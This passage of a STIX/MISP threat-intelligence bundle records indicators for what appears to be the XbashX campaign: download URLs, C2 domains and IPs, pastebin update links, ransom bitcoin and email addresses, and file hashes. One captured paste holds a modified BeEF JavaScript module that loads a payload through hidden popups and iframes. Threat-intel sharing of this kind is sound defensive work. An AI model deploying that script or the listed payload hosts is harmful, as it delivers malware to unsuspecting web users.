URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/r88.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:14.000Z", "modified": "2018-09-19T04:47:14.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashX']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": 
"indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:14.000Z", "modified": "2018-09-19T04:47:14.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://png.realtimenews.tk/m.png']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:14.000Z", "modified": "2018-09-19T04:47:14.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://daknobcq4zal6vbm.tk/tt.txt']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:15.000Z", "modified": "2018-09-19T04:47:15.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://d3goboxon32grk2l.tk/reg9.sct']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:15Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f", "created_by_ref": 
"identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:47.000Z", "modified": "2018-09-19T04:47:47.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'ejectrift.censys.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:47.000Z", "modified": "2018-09-19T04:47:47.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.censys.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:48.000Z", "modified": "2018-09-19T04:47:48.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'api.leakingprivacy.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:48Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": 
"2018-09-19T04:47:48.000Z", "modified": "2018-09-19T04:47:48.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'news.realnewstime.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:48Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:48.000Z", "modified": "2018-09-19T04:47:48.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.realnewstime.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:48Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:49.000Z", "modified": "2018-09-19T04:47:49.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'news.realtimenews.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:49Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:49.000Z", "modified": 
"2018-09-19T04:47:49.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scanaan.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:49Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:50.000Z", "modified": "2018-09-19T04:47:50.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.3g2upl4pq6kufc4m.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:50Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:50.000Z", "modified": "2018-09-19T04:47:50.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.vfk2k5s5tfjr27tz.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:50Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:51.000Z", "modified": "2018-09-19T04:47:51.000Z", "description": "Domains for C2 
Communication", "pattern": "[domain-name:value = 'scan.blockbitcoin.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:51Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:51.000Z", "modified": "2018-09-19T04:47:51.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'blockbitcoin.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:51Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d508-02d8-44e3-a778-27c3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:08.000Z", "modified": "2018-09-19T04:48:08.000Z", "description": "IPs for C2 Communication", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '142.44.215.177']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:08Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:09.000Z", "modified": "2018-09-19T04:48:09.000Z", "description": "IPs for C2 Communication", 
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.217.61.147']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:31.000Z", "modified": "2018-09-19T04:48:31.000Z", "description": "URLs for C2 Domain Updating", "pattern": "[url:value = 'https://pastebin.com/raw/Xu74Mzif']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:31Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:31.000Z", "modified": "2018-09-19T04:48:31.000Z", "description": "URLs for C2 Domain Updating", "pattern": "[url:value = 'https://pastebin.com/raw/rBHjTZY6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:31Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:02.000Z", "modified": "2018-09-19T04:49:02.000Z", "labels": [ "misp:type=\"btc\"", 
"misp:category=\"Financial fraud\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Financial fraud", "x_misp_type": "btc", "x_misp_value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:02.000Z", "modified": "2018-09-19T04:49:02.000Z", "labels": [ "misp:type=\"btc\"", "misp:category=\"Financial fraud\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Financial fraud", "x_misp_type": "btc", "x_misp_value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:35.000Z", "modified": "2018-09-19T04:49:35.000Z", "description": "Email Addresses in Ransom Messages", "pattern": "[email-message:to_refs[*].value = 'backupsql@protonmail.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:49:35Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"email-dst\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d560-0e08-460b-9909-480b950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:36.000Z", "modified": "2018-09-19T04:49:36.000Z", "description": "Email Addresses in Ransom Messages", "pattern": "[email-message:to_refs[*].value = 'backupsql@pm.me']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:49:36Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"email-dst\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": 
"indicator", "spec_version": "2.1", "id": "indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:36.000Z", "modified": "2018-09-19T04:49:36.000Z", "description": "Email Addresses in Ransom Messages", "pattern": "[email-message:to_refs[*].value = 'backupdatabase@pm.me']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:49:36Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"email-dst\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:50:52.000Z", "modified": "2018-09-19T04:50:52.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh", "category": "Other", "uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/raw/Xu74Mzif", "category": "Network activity", "to_ids": true, "uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:52:26.000Z", "modified": "2018-09-19T04:52:26.000Z", "labels": [ 
"misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "142.44.215.177\r\n144.217.61.147", "category": "Other", "uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/raw/rBHjTZY6", "category": "Network activity", "to_ids": true, "uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:54:11.000Z", "modified": "2018-09-19T04:54:11.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = \"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar 
dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif (document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = 
function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}", "category": "Other", "uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d674-5500-4354-b426-4bad950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d674-e264-47fd-a089-449e950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/raw/AbhwC1Ki", "category": "Network activity", "to_ids": true, "uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:55:42.000Z", "modified": "2018-09-19T04:55:42.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "https://daknobcq4zal6vbm.tk/m.exe;", "category": 
"Other", "uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/R5q9wvHw", "category": "Network activity", "to_ids": true, "uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:02.000Z", "modified": "2018-09-19T05:21:02.000Z", "pattern": "[file:hashes.MD5 = '33357485c5c92f087bd53602d6d8a48b' AND file:hashes.SHA1 = '7403a54aa5ff712a8614e6a90398322d5fa7ba89' AND file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:02Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:01.000Z", "modified": "2018-09-19T05:21:01.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T19:28:42", "category": "Other", "uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a" }, { "type": "link", "object_relation": "permalink", "value": 
"https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/", "category": "External analysis", "uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82" }, { "type": "text", "object_relation": "detection-ratio", "value": "9/53", "category": "Other", "uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:05.000Z", "modified": "2018-09-19T05:21:05.000Z", "pattern": "[file:hashes.MD5 = '1de7ceb3434243aa94296393165f89e7' AND file:hashes.SHA1 = '67a12afbe6751418141284716235a6b27c17443a' AND file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:05Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:03.000Z", "modified": "2018-09-19T05:21:03.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:22", "category": "Other", "uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/", "category": "External analysis", "uuid": "abcf84f8-0717-443f-b190-4c623df3933d" }, { "type": "text", "object_relation": 
"detection-ratio", "value": "26/58", "category": "Other", "uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:07.000Z", "modified": "2018-09-19T05:21:07.000Z", "pattern": "[file:hashes.MD5 = 'f8c7e23c71478aa99dc3627da989b2ca' AND file:hashes.SHA1 = 'e41d26b124c21b2c82b77194ed6be6ee8281410a' AND file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:07Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:05.000Z", "modified": "2018-09-19T05:21:05.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T20:07:10", "category": "Other", "uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/", "category": "External analysis", "uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad" }, { "type": "text", "object_relation": "detection-ratio", "value": "10/58", "category": "Other", "uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": 
